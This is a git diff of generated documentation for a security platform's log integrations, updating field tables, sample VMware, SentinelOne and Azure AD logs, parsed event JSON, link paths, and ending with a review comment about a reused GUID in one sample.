@@ -1077,6 +1204,7 @@ The following table lists the fields that are extracted, normalized under the EC |`source.user.domain` | `keyword` | Name of the directory the user is a member of. | |`source.user.name` | `keyword` | Short name or login of the user. | |`url.path` | `wildcard` | Path of the request, such as "/search". | +|`user.domain` | `keyword` | Name of the directory the user is a member of. | |`user.name` | `keyword` | Short name or login of the user. | |`user_agent.original` | `keyword` | Unparsed user_agent string. | |`vmware_vcenter.api_invocations` | `keyword` | The number of API invocations made | diff --git a/_shared_content/operations_center/integrations/generated/0642b03a-9d4a-4c88-a5e2-4597e366b8c4_sample.md b/_shared_content/operations_center/integrations/generated/0642b03a-9d4a-4c88-a5e2-4597e366b8c4_sample.md index 4e8a92a89f..84c99f7e32 100644 --- a/_shared_content/operations_center/integrations/generated/0642b03a-9d4a-4c88-a5e2-4597e366b8c4_sample.md +++ b/_shared_content/operations_center/integrations/generated/0642b03a-9d4a-4c88-a5e2-4597e366b8c4_sample.md @@ -44,6 +44,22 @@ In this section, you will find examples of raw logs as generated natively by the +=== "other_tests_example1_type_7" + + ``` + Event [11111111] [1-1] [2024-06-18T23:41:05.366919Z] [vim.event.ScheduledTaskCompletedEvent] [info] [com.vmware.vcIntegrity] [] [22222222] [Task VMware vSphere Update Manager Check Notification on Datacenters in datacenter completed successfully] + ``` + + + +=== "other_tests_example2_type_7" + + ``` + Event [11111111] [1-1] [2024-06-18T23:28:06.155764Z] [vim.event.EventEx] [info] [System] [Datacenter] [11111111] [Hardware Sensor Status: Processor Green, Memory Green, Fan Green, Voltage Green, Temperature Green, Power Green, System Board Green, Battery Green, Storage Green, Other Green] + ``` + + + === "others_events" ``` 
@@ -71,15 +87,7 @@ In this section, you will find examples of raw logs as generated natively by the === "others_events_type3" ``` - 2023-05-11T10:22:26.181+0000: 23134193.224: [GC (Allocation Failure) - ``` - - - -=== "others_events_type4" - - ``` - Desired survivor size 1572864 bytes, new threshold 1 (max 15) + 2023-05-11T10:22:26.181+0000: 23134193.224: [GC (Allocation Failure)] ``` @@ -180,6 +188,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "session_logs_type3_wo_hostname" + + ``` + Event [11111111] [1-1] [2024-06-18T22:45:08.003776Z] [vim.event.UserLogoutSessionEvent] [info] [root\example] [] [22222222] [User root\example@127.0.0.1 logged out (login time: Tuesday, 18 June, 2024 10:45:07 PM, number of API invocations: 2, user agent: VMware vim-java 1.0)] + ``` + + + === "session_logs_type4" ``` diff --git a/_shared_content/operations_center/integrations/generated/064f7e8b-ce5f-474d-802e-e88fe2193365.md b/_shared_content/operations_center/integrations/generated/064f7e8b-ce5f-474d-802e-e88fe2193365.md index bd90f999cb..03bf80f489 100644 --- a/_shared_content/operations_center/integrations/generated/064f7e8b-ce5f-474d-802e-e88fe2193365.md +++ b/_shared_content/operations_center/integrations/generated/064f7e8b-ce5f-474d-802e-e88fe2193365.md 
@@ -29,7 +29,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "attack_discovery_detection_event.json" diff --git a/_shared_content/operations_center/integrations/generated/07c0cac8-f68f-11ea-adc1-0242ac120002.md b/_shared_content/operations_center/integrations/generated/07c0cac8-f68f-11ea-adc1-0242ac120002.md index 09f0c245fa..c7e88d567d 100644 --- a/_shared_content/operations_center/integrations/generated/07c0cac8-f68f-11ea-adc1-0242ac120002.md +++ b/_shared_content/operations_center/integrations/generated/07c0cac8-f68f-11ea-adc1-0242ac120002.md 
@@ -28,7 +28,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "accept.json" diff --git a/_shared_content/operations_center/integrations/generated/07c556c0-0675-478c-9803-e7990afe78b6.md b/_shared_content/operations_center/integrations/generated/07c556c0-0675-478c-9803-e7990afe78b6.md index 347b729378..31ff406f71 100644 --- a/_shared_content/operations_center/integrations/generated/07c556c0-0675-478c-9803-e7990afe78b6.md +++ b/_shared_content/operations_center/integrations/generated/07c556c0-0675-478c-9803-e7990afe78b6.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "activities.json" 
@@ -728,7 +728,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"accountId\": \"123456789831564686\", \"activityType\": 5126, \"agentId\": \"1098352279374896038\", \"agentUpdatedVersion\": null, \"applications\": null, \"comments\": null, \"createdAt\": \"2022-03-29T17:20:31.139698Z\", \"data\": {\"accountName\": \"CORP\", \"bluetoothAddress\": \"\", \"computerName\": \"CORP123\", \"creator\": \"N/A\", \"deviceClass\": \"E0h\", \"deviceInformationServiceInfoKey\": \"\", \"deviceInformationServiceInfoValue\": \"\", \"deviceName\": \"\", \"eventId\": \"{1988659d-af84-11ec-914c-806e6f6e6963}\", \"eventTime\": \"2022-03-29T17:17:40.622+00:00\", \"eventType\": \"connected\", \"fullScopeDetails\": \"Group Default Group in Site CORP-Users of Account CORP\", \"fullScopeDetailsPath\": \"Global / CORP / CORP-Users / Default Group\", \"gattService\": \"\", \"groupId\": \"1083054176758610128\", \"groupName\": \"Default Group\", \"interface\": \"USB\", \"lastLoggedInUserName\": \"user.name\", \"lmpVersion\": \"N/A\", \"manufacturerName\": \"\", \"minorClass\": \"N/A\", \"osType\": \"windows\", \"productId\": \"AAA\", \"profileUuids\": \"N/A\", \"ruleId\": -1, \"ruleName\": null, \"ruleScopeName\": null, \"ruleType\": \"productId\", \"scopeLevel\": \"Group\", \"scopeName\": \"Default Group\", \"siteName\": \"CORP-Users\", \"uid\": \"\", \"vendorId\": \"8087\", \"version\": \"N/A\"}, \"description\": null, \"groupId\": \"1083054176758610128\", \"hash\": null, \"id\": \"1387019684138751044\", \"osFamily\": null, \"primaryDescription\": \"USB device was connected on CORP123.\", \"secondaryDescription\": null, \"siteId\": \"1083054176741832911\", \"threatId\": null, \"updatedAt\": \"2022-03-29T17:20:30.998054Z\", \"userId\": null}", + "message": "{\"accountId\": \"123456789831564686\", \"activityType\": 5126, \"agentId\": \"1098352279374896038\", \"agentUpdatedVersion\": null, \"applications\": null, \"comments\": null, 
\"createdAt\": \"2022-03-29T17:20:31.139698Z\", \"data\": {\"accountName\": \"CORP\", \"bluetoothAddress\": \"\", \"computerName\": \"CORP123\", \"creator\": \"N/A\", \"deviceClass\": \"E0h\", \"deviceInformationServiceInfoKey\": \"\", \"deviceInformationServiceInfoValue\": \"\", \"deviceName\": \"\", \"eventId\": \"{1988659d-af84-11ec-914c-806e6f6e6963}\", \"eventTime\": \"2022-03-29T17:17:40.622+00:00\", \"eventType\": \"connected\", \"fullScopeDetails\": \"Group Default Group in Site CORP-Users of Account CORP\", \"fullScopeDetailsPath\": \"Global / CORP / CORP-Users / Default Group\", \"gattService\": \"\", \"groupId\": \"1083054176758610128\", \"groupName\": \"Default Group\", \"interface\": \"USB\", \"lastLoggedInUserName\": \"user.name\", \"lmpVersion\": \"N/A\", \"manufacturerName\": \"\", \"minorClass\": \"N/A\", \"osType\": \"windows\", \"productId\": \"AAA\", \"profileUuids\": \"N/A\", \"ruleId\": -1, \"ruleName\": null, \"ruleScopeName\": null, \"ruleType\": \"productId\", \"scopeLevel\": \"Group\", \"scopeName\": \"Default Group\", \"siteName\": \"CORP-Users\", \"uid\": \"\", \"vendorId\": \"8A87\", \"version\": \"N/A\"}, \"description\": null, \"groupId\": \"1083054176758610128\", \"hash\": null, \"id\": \"1387019684138751044\", \"osFamily\": null, \"primaryDescription\": \"USB device was connected on CORP123.\", \"secondaryDescription\": null, \"siteId\": \"1083054176741832911\", \"threatId\": null, \"updatedAt\": \"2022-03-29T17:20:30.998054Z\", \"userId\": null}", "event": { "action": "Device Control Approved Event", "category": "host", 
@@ -768,7 +768,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "eventType": "connected", "fullScopeDetails": "Group Default Group in Site CORP-Users of Account CORP", "fullScopeDetailsPath": "Global / CORP / CORP-Users / Default Group", - "groupId": 1083054176758610128, + "group": { + "id": "1083054176758610128" + }, "groupName": "Default Group", "interface": "USB", "lastLoggedInUserName": "user.name", @@ -781,7 +783,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "scopeLevel": "Group", "scopeName": "Default Group", "siteName": "CORP-Users", - "vendorId": 8087, "version": "N/A" }, "eventid": 1387019684138751044, @@ -2638,7 +2639,7 @@ The following table lists the fields that are extracted, normalized under the EC |`sentinelone.data.current` | `keyword` | | |`sentinelone.data.deactivatedEngines` | `keyword` | | |`sentinelone.data.deactivationPeriodInDays` | `keyword` | | -|`sentinelone.data.detectedat` | `long` | | +|`sentinelone.data.detectedat` | `date` | | |`sentinelone.data.deviceClass` | `keyword` | | |`sentinelone.data.deviceInformationServiceInfoKey` | `keyword` | | |`sentinelone.data.deviceInformationServiceInfoValue` | `keyword` | | @@ -2666,7 +2667,7 @@ The following table lists the fields that are extracted, normalized under the EC |`sentinelone.data.fullScopeDetailsPath` | `keyword` | | |`sentinelone.data.gattService` | `keyword` | | |`sentinelone.data.globalStatus` | `keyword` | | -|`sentinelone.data.groupId` | `long` | | +|`sentinelone.data.group.id` | `keyword` | | |`sentinelone.data.groupName` | `keyword` | | |`sentinelone.data.indicatorcategory` | `keyword` | | |`sentinelone.data.indicatordescription` | `keyword` | | 
@@ -2822,7 +2823,6 @@ The following table lists the fields that are extracted, normalized under the EC |`sentinelone.data.userScope` | `keyword` | | |`sentinelone.data.userscope` | `keyword` | | |`sentinelone.data.uuid` | `keyword` | | -|`sentinelone.data.vendorId` | `long` | | |`sentinelone.data.version` | `keyword` | | |`sentinelone.description` | `keyword` | | |`sentinelone.eventid` | `long` | | @@ -2849,7 +2849,6 @@ The following table lists the fields that are extracted, normalized under the EC |`sentinelone.threatInfo.classificationSource` | `keyword` | | |`sentinelone.threatInfo.cloudFilesHashVerdict` | `keyword` | | |`sentinelone.threatInfo.collectionId` | `keyword` | | -|`sentinelone.threatInfo.detectionEngines` | `object` | | |`sentinelone.threatInfo.detectionType` | `keyword` | | |`sentinelone.threatInfo.engines` | `keyword` | | |`sentinelone.threatInfo.externalTicketExists` | `bool` | | diff --git a/_shared_content/operations_center/integrations/generated/07c556c0-0675-478c-9803-e7990afe78b6_sample.md b/_shared_content/operations_center/integrations/generated/07c556c0-0675-478c-9803-e7990afe78b6_sample.md index abb5a7d618..2bce2d791f 100644 --- a/_shared_content/operations_center/integrations/generated/07c556c0-0675-478c-9803-e7990afe78b6_sample.md +++ b/_shared_content/operations_center/integrations/generated/07c556c0-0675-478c-9803-e7990afe78b6_sample.md @@ -518,7 +518,7 @@ In this section, you will find examples of raw logs as generated natively by the "scopeName": "Default Group", "siteName": "CORP-Users", "uid": "", - "vendorId": "8087", + "vendorId": "8A87", "version": "N/A" }, "description": null, diff --git a/_shared_content/operations_center/integrations/generated/0ba58f32-7dba-4084-ab17-90c0be6b1f10.md b/_shared_content/operations_center/integrations/generated/0ba58f32-7dba-4084-ab17-90c0be6b1f10.md index 5b8a3cafd1..ada69810ce 100644 --- a/_shared_content/operations_center/integrations/generated/0ba58f32-7dba-4084-ab17-90c0be6b1f10.md 
+++ b/_shared_content/operations_center/integrations/generated/0ba58f32-7dba-4084-ab17-90c0be6b1f10.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "http.json" diff --git a/_shared_content/operations_center/integrations/generated/0de050fb-3f56-4c7a-a9b6-76bf5298a617.md b/_shared_content/operations_center/integrations/generated/0de050fb-3f56-4c7a-a9b6-76bf5298a617.md index 3f3594dcee..c43b82f61c 100644 --- a/_shared_content/operations_center/integrations/generated/0de050fb-3f56-4c7a-a9b6-76bf5298a617.md +++ b/_shared_content/operations_center/integrations/generated/0de050fb-3f56-4c7a-a9b6-76bf5298a617.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "malop_connection.json" diff --git a/_shared_content/operations_center/integrations/generated/10999b99-9a8d-4b92-9fbd-01e3fac01cd5.md b/_shared_content/operations_center/integrations/generated/10999b99-9a8d-4b92-9fbd-01e3fac01cd5.md index 0122c66883..614e049ea4 100644 --- a/_shared_content/operations_center/integrations/generated/10999b99-9a8d-4b92-9fbd-01e3fac01cd5.md +++ b/_shared_content/operations_center/integrations/generated/10999b99-9a8d-4b92-9fbd-01e3fac01cd5.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "telemetry_event.json" diff --git a/_shared_content/operations_center/integrations/generated/162064f0-c594-455e-ac24-2d7129137688.md b/_shared_content/operations_center/integrations/generated/162064f0-c594-455e-ac24-2d7129137688.md index aab1f6ea99..acb14577a4 100644 --- a/_shared_content/operations_center/integrations/generated/162064f0-c594-455e-ac24-2d7129137688.md +++ b/_shared_content/operations_center/integrations/generated/162064f0-c594-455e-ac24-2d7129137688.md 
@@ -19,7 +19,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "auth_conversation_failed.json" diff --git a/_shared_content/operations_center/integrations/generated/16676d72-463e-4b8a-b13a-f8dd48cddc8c.md b/_shared_content/operations_center/integrations/generated/16676d72-463e-4b8a-b13a-f8dd48cddc8c.md index 7818607d55..e965b436bb 100644 --- a/_shared_content/operations_center/integrations/generated/16676d72-463e-4b8a-b13a-f8dd48cddc8c.md +++ b/_shared_content/operations_center/integrations/generated/16676d72-463e-4b8a-b13a-f8dd48cddc8c.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "403.json" diff --git a/_shared_content/operations_center/integrations/generated/19cd2ed6-f90c-47f7-a46b-974354a107bb.md b/_shared_content/operations_center/integrations/generated/19cd2ed6-f90c-47f7-a46b-974354a107bb.md index 7aba955134..dde7feb8c0 100644 --- a/_shared_content/operations_center/integrations/generated/19cd2ed6-f90c-47f7-a46b-974354a107bb.md +++ b/_shared_content/operations_center/integrations/generated/19cd2ed6-f90c-47f7-a46b-974354a107bb.md 
@@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "add_domain.json" 
@@ -326,85 +326,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "auth.json" - - ```json - - { - "message": "{\"id\":\"39e3a81e-99b9-4a30-8000-f38a970e5100\",\"createdDateTime\":\"2020-09-28T10:12:41.4104242Z\",\"userDisplayName\":\"Jane Doe\",\"userPrincipalName\":\"jane.doe@sekoiacorp.onmicrosoft.com\",\"userId\":\"913f4b76-e10f-4f1c-aaf1-09356389319b\",\"appId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"appDisplayName\":\"O365 Suite UX\",\"ipAddress\":\"11.11.11.11\",\"clientAppUsed\":\"Browser\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0\",\"correlationId\":\"26e7584c-876b-425f-9119-49b411e21365\",\"conditionalAccessStatus\":\"notApplied\",\"originalRequestId\":\"39e3a81e-99b9-4a30-8000-f38a970e5100\",\"isInteractive\":false,\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"processingTimeInMilliseconds\":101,\"riskDetail\":\"hidden\",\"riskLevelAggregated\":\"hidden\",\"riskLevelDuringSignIn\":\"hidden\",\"riskState\":\"none\",\"riskEventTypes\":[],\"riskEventTypes_v2\":[],\"resourceDisplayName\":\"Windows Azure Active Directory\",\"resourceId\":\"00000002-0000-0000-c000-000000000000\",\"resourceTenantId\":\"aa09a079-7796-46a8-a4d4-4d21b0dcf1b2\",\"authenticationMethodsUsed\":[],\"authenticationRequirement\":\"multiFactorAuthentication\",\"alternateSignInName\":null,\"servicePrincipalName\":null,\"signInEventTypes\":[],\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":0,\"failureReason\":\"Other.\",\"additionalDetails\":\"MFA requirement satisfied by claim in the token\"},\"deviceDetail\":{\"deviceId\":\"\",\"displayName\":null,\"operatingSystem\":\"Windows 10\",\"browser\":\"Firefox 
81.0\",\"isCompliant\":null,\"isManaged\":null,\"trustType\":null},\"location\":{\"city\":\"Paris\",\"state\":\"Paris\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"altitude\":null,\"latitude\":48.861000061035156,\"longitude\":2.3380000591278076}},\"mfaDetail\":{\"authMethod\":null,\"authDetail\":null},\"appliedConditionalAccessPolicies\":[],\"authenticationProcessingDetails\":[{\"key\":\"Login Hint Present\",\"value\":\"True\"},{\"key\":\"IsCAEToken\",\"value\":\"False\"}],\"networkLocationDetails\":[],\"authenticationDetails\":[{\"authenticationStepDateTime\":\"2020-09-28T10:12:41.4104242Z\",\"authenticationMethod\":null,\"authenticationMethodDetail\":null,\"succeeded\":true,\"authenticationStepResultDetail\":\"MFA requirement satisfied by claim in the token\",\"authenticationStepRequirement\":\"User\"}],\"authenticationRequirementPolicies\":[]}", - "event": { - "category": [ - "authentication" - ], - "type": [ - "start" - ] - }, - "@timestamp": "2020-09-28T10:12:41.410424Z", - "action": { - "name": "authentication", - "target": "user" - }, - "azuread": { - "authenticationDetails": [ - { - "authenticationMethod": null, - "authenticationMethodDetail": null, - "authenticationStepDateTime": "2020-09-28T10:12:41.4104242Z", - "authenticationStepRequirement": "User", - "authenticationStepResultDetail": "MFA requirement satisfied by claim in the token", - "succeeded": true - } - ], - "authenticationRequirement": "multiFactorAuthentication", - "authenticationRequirementPolicies": [], - "correlationId": "26e7584c-876b-425f-9119-49b411e21365", - "resourceId": "00000002-0000-0000-c000-000000000000", - "resourceTenantId": "aa09a079-7796-46a8-a4d4-4d21b0dcf1b2", - "tokenIssuerType": "AzureAD" - }, - "host": { - "os": { - "name": "Windows 10" - } - }, - "related": { - "ip": [ - "11.11.11.11" - ], - "user": [ - "jane.doe@sekoiacorp.onmicrosoft.com" - ] - }, - "service": { - "name": "Windows Azure Active Directory", - "type": "ldap" - }, - "source": { - "address": 
"11.11.11.11", - "ip": "11.11.11.11" - }, - "user": { - "id": "913f4b76-e10f-4f1c-aaf1-09356389319b", - "name": "jane.doe@sekoiacorp.onmicrosoft.com" - }, - "user_agent": { - "device": { - "name": "Other" - }, - "name": "Firefox", - "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0", - "os": { - "name": "Windows", - "version": "10" - }, - "version": "81.0" - } - } - - ``` - - === "change_user_password.json" ```json @@ -472,6 +393,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "event": { "category": [ "authentication" + ], + "id": "00000000-0000-0000-0000-000000000000", + "type": [ + "start" ] }, "@timestamp": "2022-04-05T13:07:16.779653Z", @@ -480,6 +405,17 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "azuread": { "Level": 4, + "authenticationDetails": [ + { + "RequestSequence": 1, + "StatusSequence": 0, + "authenticationMethod": "Password", + "authenticationMethodDetail": "Password Hash Sync", + "authenticationStepDateTime": "2022-04-05T13:07:16.7796535+00:00", + "authenticationStepRequirement": "Primary authentication", + "succeeded": true + } + ], "callerIpAddress": "2001:0db8:85a3:0000:0000:8a2e:0370:7334", "category": "SignInLogs", "correlationId": "7ee10819-f631-4ab1-8edb-4efb7286baba", @@ -529,7 +465,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "user": { "email": "jean.dupont@corp.com", - "full_name": "DUPONT Jean" + "full_name": "DUPONT Jean", + "id": "a1c4edf3-59b6-40a8-a1cd-820691c0bab0" }, "user_agent": { "device": { @@ -609,7 +546,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "category": [ "authentication" ], - "reason": "External security challenge was not satisfied." + "reason": "External security challenge was not satisfied.", + "type": [ + "start" + ] }, "@timestamp": "2022-03-30T14:52:21.706218Z", "action": { 
@@ -617,6 +557,17 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "azuread": { "Level": 4, + "authenticationDetails": [ + { + "RequestSequence": 0, + "StatusSequence": 0, + "authenticationMethod": "Previously satisfied", + "authenticationStepDateTime": "2022-03-30T14:52:21.7062186+00:00", + "authenticationStepRequirement": "Primary authentication", + "authenticationStepResultDetail": "First factor requirement satisfied by claim in the token", + "succeeded": true + } + ], "callerIpAddress": "11.11.11.11", "category": "SignInLogs", "correlationId": "e68960e2-8996-448c-ba7a-e54eeb8ff2ed", @@ -677,7 +628,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "user": { "email": "User.Name@corp.name", - "full_name": "User Name" + "full_name": "User Name", + "id": "469a0b32-4a8d-4b73-89aa-25ab78df7523" }, "user_agent": { "device": { @@ -705,6 +657,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "event": { "category": [ "authentication" + ], + "id": "00000000-0000-0000-0000-000000000000", + "type": [ + "start" ] }, "@timestamp": "2022-03-31T12:26:46.019095Z", @@ -713,6 +669,17 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "azuread": { "Level": 4, + "authenticationDetails": [ + { + "RequestSequence": 0, + "StatusSequence": 0, + "authenticationMethod": "Previously satisfied", + "authenticationStepDateTime": "2022-03-31T12:26:46.0190957+00:00", + "authenticationStepRequirement": "Primary authentication", + "authenticationStepResultDetail": "First factor requirement satisfied by claim in the token", + "succeeded": true + } + ], "callerIpAddress": "11.11.11.11", "category": "SignInLogs", "correlationId": "467c1340-0762-40d2-b6fb-339235633ebb", 
@@ -773,7 +740,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "user": { "email": "admin.jdupont@corp.net", - "full_name": "Admin Jean Dupont" + "full_name": "Admin Jean Dupont", + "id": "16cc2d55-637f-4e04-850d-a1048b659112" }, "user_agent": { "device": { @@ -801,6 +769,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "event": { "category": [ "authentication" + ], + "id": "00000000-0000-0000-0000-000000000000", + "type": [ + "start" ] }, "@timestamp": "2023-08-16T15:32:05.577260Z", @@ -809,6 +781,26 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "azuread": { "Level": 4, + "authenticationDetails": [ + { + "RequestSequence": 1, + "StatusSequence": 0, + "authenticationMethod": "Password", + "authenticationMethodDetail": "Pass-through Authentication", + "authenticationStepDateTime": "2023-08-16T15:28:23.3045933+00:00", + "authenticationStepRequirement": "Primary authentication", + "succeeded": true + }, + { + "RequestSequence": 1692199690724, + "StatusSequence": 1692199702901, + "authenticationMethod": "Mobile app notification", + "authenticationStepDateTime": "2023-08-16T15:28:22+00:00", + "authenticationStepRequirement": "Primary authentication", + "authenticationStepResultDetail": "MFA successfully completed", + "succeeded": true + } + ], "callerIpAddress": "1.2.3.4", "category": "SignInLogs", "correlationId": "93f63260-ad9a-4087-b7e0-d9010cb919dd", @@ -869,7 +861,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "user": { "email": "john.doe@example.org", - "full_name": "John DOE" + "full_name": "John DOE", + "id": "93f63260-ad9a-4087-b7e0-d9010cb919dd" }, "user_agent": { "device": { @@ -896,6 +889,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "event": { "category": [ "authentication" + ], + "type": [ + "start" ] }, "@timestamp": "2023-10-04T13:09:02.679994Z", 
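Review bot: in hunk @@ -869,7 +861,8 the new `user.id` value `93f63260-ad9a-4087-b7e0-d9010cb919dd` is identical to that same event's `correlationId` in hunk @@ -809,6 +781,26, whereas every other sample gets a user id that differs from its correlation id. Check whether the parser reads `userId` or falls back to `correlationId`, or whether the fixture simply reuses the GUID, before shipping a field that detection rules will join on; if it is a fixture artefact, change the sample so the two values differ.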
